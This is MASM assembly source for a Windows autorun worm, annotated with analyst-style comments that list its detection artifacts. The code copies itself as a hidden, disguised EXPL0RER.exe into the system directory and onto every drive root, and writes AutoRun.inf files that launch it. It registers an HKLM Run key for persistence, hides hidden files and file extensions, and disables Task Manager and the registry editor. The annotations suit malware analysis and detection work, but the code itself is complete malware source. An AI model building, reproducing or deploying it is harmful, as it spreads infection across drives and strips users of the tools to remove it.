;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; MASM source: 32-bit flat memory model, stdcall calling convention for the
; Win32 API calls below, and case-sensitive symbol names (casemap:none).
.386
.model flat, stdcall
option casemap :none
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Include 文件定义
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
include windows.inc
include user32.inc
includelib user32.lib
include kernel32.inc
includelib kernel32.lib
include ole32.inc
includelib ole32.lib
include shell32.inc
includelib shell32.lib
include Advapi32.inc
includelib Advapi32.lib
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Equ 等值定义
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Resource / dialog control IDs. None of them is referenced in this file
; (no dialog or window is created here); they are presumably consumed by
; the included _DisposalExe.asm or a resource script — unverified from here.
ICO_MAIN equ 1000
DLG_MAIN equ 100
IDC_RESULT equ 101
IDC_BROWSE equ 102
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; 数据段
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Uninitialised (zero-filled) globals.
.data?
hInstance dd ? ; never written or read in this file
hRichEdit dd ? ; passed to FreeLibrary at exit; never assigned in this file, so it holds 0 unless the included file sets it
hWinMain dd ? ; unused in this file
szSystemPath db MAX_PATH dup (?) ; filled by _CurrentDir with "<system dir>\"; _CopyMe then appends szFileName to it
szFilePath db MAX_PATH dup (?) ; copy of szMyPath made in _CopyMe; not read afterwards in this file
szMyPath db MAX_PATH dup (?) ; own module path, from GetModuleFileName in _CopyMe
; CreateThread writes the *thread id* here, not a handle, despite the HANDLE type
; (see CloseHandle,dwThreadID3 at the entry point, which is handed this id).
dwThreadID1 HANDLE ?
dwThreadID2 HANDLE ? ; unused in this file
dwThreadID3 HANDLE ?
; Read-only literals. Analyst note: these strings are the sample's observable
; artifacts — the dropped file name, the autorun.inf body and the registry
; keys/values it writes — and are the natural basis for file- and
; registry-based detection of this code.
.const
szDllEdit db 'RichEd20.dll',0 ; RichEdit library/class names; not referenced in this file
szClassEdit db 'RichEdit20A',0
szAutorunNme db 'AutoRun.inf',0 ; name of the file dropped at each drive root by _BindEntry
; Body written verbatim to AutoRun.inf by _CreateAutorun; every action points at szFileName.
szAutorunCnt db '[AutoRun]',0dh,0ah,'open=EXPL0RER.exe',0dh,0ah,'shellexecute=EXPL0RER.exe',0dh,0ah,'shell\Auto\command=EXPL0RER.exe',0dh,0ah,'shell=Auto',0
szFileName db 'EXPL0RER.exe',0 ; name of the self-copy (note the digit zero in place of the letter O)
; Registry locations touched by _RegAmend.
szKeyAutoRun db 'Software\Microsoft\Windows\CurrentVersion\Run',0 ; HKLM run key: persistence
szKeyShowMaster db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced',0 ; HKCU: per-user Explorer view settings
szKeyManage db 'Software\Microsoft\Windows\CurrentVersion\Policies\System',0 ; HKCU: policy restrictions
szKeyShowall db '\Folder\Hidden\SHOWALL',0 ; appended to szKeyShowMaster under HKLM
szKeyValueName db 'CheckedValue',0 ; set to 0 under ...\SHOWALL
szHidden db 'Hidden',0 ; set to 0
szHideFileExt db 'HideFileExt',0 ; set to 1
szShowSuperHidden db 'ShowSuperHidden',0 ; set to 0
szDisableTaskmgr db 'DisableTaskmgr',0 ; set to the current @mValue (1 on the normal path)
szDisableRegistryTools db 'DisableRegistryTools',0 ; set to the current @mValue (1 on the normal path)
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;包含头文件
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
include _DisposalExe.asm
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;代码段
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
.code
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;在可用驱动器根目录下建立AUTORUN文件
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;-----------------------------------------------------------------------
; _CreateAutorun(_RunFilePath)
; Creates or truncates the file named by _RunFilePath (CREATE_ALWAYS) with
; the SYSTEM|HIDDEN attributes and writes szAutorunCnt into it verbatim
; (sizeof szAutorunCnt bytes, i.e. including the trailing NUL).
; In:    _RunFilePath = full path of the file to write (stack arg, stdcall)
; Out:   eax = CloseHandle result; nothing else is returned
; Notes: the CreateFile result is not checked, so on failure the value
;        passed to WriteFile/CloseHandle is INVALID_HANDLE_VALUE.
;        Detection: a hidden+system AutoRun.inf at a drive root whose body
;        matches szAutorunCnt is the artifact this routine leaves behind.
;-----------------------------------------------------------------------
_CreateAutorun proc _RunFilePath
local @hFile,@WrtSize
invoke CreateFile,_RunFilePath,GENERIC_WRITE,FILE_SHARE_READ,\ ;create / truncate the file
0,CREATE_ALWAYS,FILE_ATTRIBUTE_SYSTEM or FILE_ATTRIBUTE_HIDDEN,0
mov @hFile,eax ; unchecked: may be INVALID_HANDLE_VALUE
invoke WriteFile,@hFile,addr szAutorunCnt,sizeof szAutorunCnt,\ ;write the autorun body
addr @WrtSize,NULL
invoke CloseHandle,@hFile
ret
_CreateAutorun endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;获得当前目录和系统目录并保存
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;-----------------------------------------------------------------------
; _CurrentDir()
; Fetches the Windows system directory, makes sure it ends in '\', and
; stores the result in the global szSystemPath.
; Runs as a separate thread (CreateThread at the entry point); it takes no
; parameter, so the thread argument is ignored.
; Out:   szSystemPath = "<system dir>\"
; Clobb: eax (ebx/esi/edi are saved by `uses`)
; Notes: nothing synchronises this thread with _CopyMe, which appends to
;        szSystemPath from the _Browse thread; if this thread has not
;        finished by then, _CopyMe works on an empty or partial buffer.
;-----------------------------------------------------------------------
_CurrentDir proc uses ebx esi edi
local @szBuffer[MAX_PATH]:byte
invoke RtlZeroMemory,addr @szBuffer,sizeof @szBuffer
invoke GetSystemDirectory,addr @szBuffer,sizeof @szBuffer ;system directory into the local buffer
;>>>>>>append a trailing "\" if the path does not already end with one
invoke lstrlen,addr @szBuffer
lea ebx,@szBuffer
add ebx,eax ; ebx -> terminating NUL
xor eax,eax
mov al,'\' ; ax = 005Ch: '\' followed by a NUL
.if byte ptr [ebx-1] != al
mov word ptr [ebx],ax ; writes '\' and the new terminator in one store
.endif
invoke lstrcpy,addr szSystemPath,addr @szBuffer ;publish to the global
ret
_CurrentDir endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;文件捆绑函数
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;-----------------------------------------------------------------------
; _BindEntry(_lParam)
; Plants the two artifacts at one drive root: "<root>AutoRun.inf" (via
; _CreateAutorun) and "<root>EXPL0RER.exe", a copy of this module taken
; from szMyPath, overwriting any existing file (bFailIfExists = FALSE) and
; marked SYSTEM|HIDDEN. Finally calls _FindExe.
; In:    _lParam = pointer to a drive-root string (e.g. "X:\", as produced
;        by GetLogicalDriveStrings and passed on by _CopyMe)
; Notes: @szBuffer is 128 bytes; the root string is assumed to be short.
;        _FindExe and szBufferPath are not defined in this file — they
;        presumably come from the included _DisposalExe.asm (unverified).
;        Detection: hidden+system EXPL0RER.exe next to AutoRun.inf at a
;        drive root, identical to the running module.
;-----------------------------------------------------------------------
_BindEntry proc uses ebx esi edi,_lParam
local @szBuffer[128]:byte
invoke lstrcpy,addr @szBuffer,_lParam
invoke lstrcat,addr @szBuffer,addr szAutorunNme ; "<root>AutoRun.inf"
invoke _CreateAutorun,addr @szBuffer ;drop the inf file
invoke lstrcpy,addr @szBuffer,_lParam
invoke lstrcat,addr @szBuffer,addr szFileName ; "<root>EXPL0RER.exe"
invoke CopyFile,addr szMyPath,addr @szBuffer,FALSE ;copy self (overwrite allowed)
invoke SetFileAttributes,addr @szBuffer,FILE_ATTRIBUTE_SYSTEM or FILE_ATTRIBUTE_HIDDEN
invoke _FindExe,addr szBufferPath ;defined outside this file (see notes above)
ret
_BindEntry endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;向可用驱动器和系统目录拷贝自身
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;-----------------------------------------------------------------------
; _CopyMe(_szDir)
; Copies this module to "<szSystemPath>EXPL0RER.exe" (SYSTEM|HIDDEN), then
; walks the drive list in _szDir and calls _BindEntry for each entry.
; In:    _szDir = buffer from GetLogicalDriveStrings: "X:\",0 entries
;        followed by an empty string (double NUL)
; Clobb: none visible to the caller (pushad/popad); locals @dwThreadID and
;        @MyPath are declared but never used
; Notes: szSystemPath is extended in place, so after this call the global
;        holds the full path of the system-directory copy — that is the
;        value _RegAmend later writes to the Run key.
;        The drive filter `eax == DRIVE_FIXED || DRIVE_REMOVABLE` is parsed
;        as (eax == DRIVE_FIXED) || (DRIVE_REMOVABLE); DRIVE_REMOVABLE is
;        a non-zero constant, so the body runs for every drive string
;        regardless of type.
;        `add esi,4` assumes every entry is exactly "X:\",0 (4 bytes).
;-----------------------------------------------------------------------
_CopyMe proc _szDir
local @dwThreadID
local @MyPath[MAX_PATH]:byte,@szBuffer[128]:byte
pushad
mov esi,_szDir ; esi -> current drive-root entry
invoke GetModuleFileName,NULL,addr szMyPath,MAX_PATH ; own path -> szMyPath
invoke lstrcpy,addr szFilePath,addr szMyPath
invoke lstrcat,addr szSystemPath,addr szFileName ; szSystemPath = "<sysdir>\EXPL0RER.exe" (relies on _CurrentDir having run)
invoke CopyFile,addr szMyPath,addr szSystemPath,FALSE ;copy self into the system directory
invoke SetFileAttributes,addr szSystemPath,FILE_ATTRIBUTE_SYSTEM or FILE_ATTRIBUTE_HIDDEN
@@:
invoke GetDriveType,esi
.if eax == DRIVE_FIXED || DRIVE_REMOVABLE ;intended as fixed-or-removable; see notes: effectively always true
invoke lstrcpy,addr @szBuffer,esi
invoke _BindEntry,addr @szBuffer
.endif
add esi,4 ; next "X:\",0 entry
cmp byte ptr [esi],0 ; empty string terminates the list
jnz @B
popad
ret
_CopyMe endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;搜索驱动器
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;-----------------------------------------------------------------------
; _Browse()
; Enumerates the logical drive roots into a 1024-byte local buffer and,
; if the call returned a non-zero length, hands the list to _CopyMe.
; Runs as a thread started from the entry point; the entry point waits
; for it to finish before touching the registry.
; Clobb: eax (ebx/esi/edi are saved by `uses`)
;-----------------------------------------------------------------------
_Browse proc uses ebx esi edi
local @szBuffer[1024]:byte
invoke GetLogicalDriveStrings,sizeof @szBuffer,addr @szBuffer ; eax = chars written (0 on failure)
.if eax
invoke _CopyMe,addr @szBuffer
.endif
ret
_Browse endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;修改注册表
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;-----------------------------------------------------------------------
; _RegAmend()
; Writes the persistence and view/policy registry values. Values written
; (each only if the preceding RegCreateKey returned ERROR_SUCCESS):
;   HKLM\Software\Microsoft\Windows\CurrentVersion\Run
;        "EXPL0RER.exe" (REG_SZ) = szSystemPath — the whole MAX_PATH buffer
;        is written (sizeof szSystemPath), not just the string length
;   HKLM\SOFTWARE\...\Explorer\Advanced\Folder\Hidden\SHOWALL
;        CheckedValue (REG_DWORD) = 0
;   HKCU\SOFTWARE\...\Explorer\Advanced
;        Hidden = 0, ShowSuperHidden = 0, HideFileExt = 1
;   HKCU\Software\...\Policies\System
;        DisableRegistryTools = @mValue, DisableTaskmgr = @mValue
;        (@mValue is 1 here only because the HKCU\...\Advanced block set
;        it; if that RegCreateKey failed, 0 is written instead)
; Notes: @hKey is reused for every key and none of the handles is closed
;        with RegCloseKey.
;        Detection: the value names above under these keys, together with
;        a Run entry pointing at a SYSTEM|HIDDEN EXPL0RER.exe in the
;        system directory, identify this sample's registry footprint.
;-----------------------------------------------------------------------
_RegAmend proc
local @hKey,@mValue
local @szBuffer[MAX_PATH]:byte
;////persistence: register the system-directory copy under the HKLM Run key/////
invoke RegCreateKey,HKEY_LOCAL_MACHINE,addr szKeyAutoRun,addr @hKey
.if eax == ERROR_SUCCESS
invoke RegSetValueEx,@hKey,addr szFileName,NULL,REG_SZ,\
addr szSystemPath,sizeof szSystemPath ; writes the full buffer, see notes
.endif
;////turn off display of hidden files////
mov @mValue,0
invoke lstrcpy,addr @szBuffer,addr szKeyShowMaster
invoke lstrcat,addr @szBuffer,addr szKeyShowall ; HKLM ...\Advanced\Folder\Hidden\SHOWALL
invoke RegCreateKey,HKEY_LOCAL_MACHINE,addr @szBuffer,addr @hKey
.if eax == ERROR_SUCCESS
invoke RegSetValueEx,@hKey,addr szKeyValueName,NULL,REG_DWORD,\
addr @mValue,sizeof @mValue ; CheckedValue = 0
.endif
invoke RegCreateKey,HKEY_CURRENT_USER,addr szKeyShowMaster,addr @hKey
.if eax == ERROR_SUCCESS
invoke RegSetValueEx,@hKey,addr szHidden,NULL,REG_DWORD,\
addr @mValue,sizeof @mValue ; Hidden = 0
invoke RegSetValueEx,@hKey,addr szShowSuperHidden,NULL,REG_DWORD,\
addr @mValue,sizeof @mValue ; ShowSuperHidden = 0
mov @mValue,1 ; stays 1 for the remaining values
invoke RegSetValueEx,@hKey,addr szHideFileExt,NULL,REG_DWORD,\
addr @mValue,sizeof @mValue ; HideFileExt = 1
.endif
invoke RegCreateKey,HKEY_CURRENT_USER,addr szKeyManage,addr @hKey
.if eax == ERROR_SUCCESS
;////disable the registry editor////
invoke RegSetValueEx,@hKey,addr szDisableRegistryTools,NULL,REG_DWORD,\
addr @mValue,sizeof @mValue
;////disable Task Manager////
invoke RegSetValueEx,@hKey,addr szDisableTaskmgr,NULL,REG_DWORD,\
addr @mValue,sizeof @mValue
.endif
ret
_RegAmend endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;-----------------------------------------------------------------------
; Entry point.
; 1. Starts _CurrentDir on its own thread and closes the handle at once
;    (the thread keeps running; nothing later waits for it).
; 2. Starts _Browse on a second thread and waits for it without timeout.
; 3. Calls _RegAmend on this thread.
; 4. FreeLibrary(hRichEdit) — hRichEdit is never assigned in this file —
;    then ExitProcess.
; Notes: CloseHandle is given dwThreadID3, which holds the *thread id*
;        CreateThread stored there, not the handle returned in eax; the
;        handle itself is never closed.
;        No synchronisation between steps 1 and 2: _CopyMe reads
;        szSystemPath, which _CurrentDir may still be filling.
;-----------------------------------------------------------------------
start:
invoke CreateThread,NULL,0,offset _CurrentDir,NULL,\ ;thread 1: fill szSystemPath
NULL,addr dwThreadID1
invoke CloseHandle,eax ; closes the handle only; the thread continues
invoke CreateThread,NULL,0,offset _Browse,NULL,\ ;thread 2: enumerate drives and drop files
NULL,addr dwThreadID3
invoke WaitForSingleObject,eax,INFINITE ; block until _Browse finishes
.if eax == WAIT_OBJECT_0
invoke CloseHandle,dwThreadID3 ; passes the thread id, not the handle (see notes)
.endif
call _RegAmend ;write persistence / view / policy values
invoke FreeLibrary,hRichEdit ; hRichEdit not set in this file
invoke ExitProcess,NULL
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
end start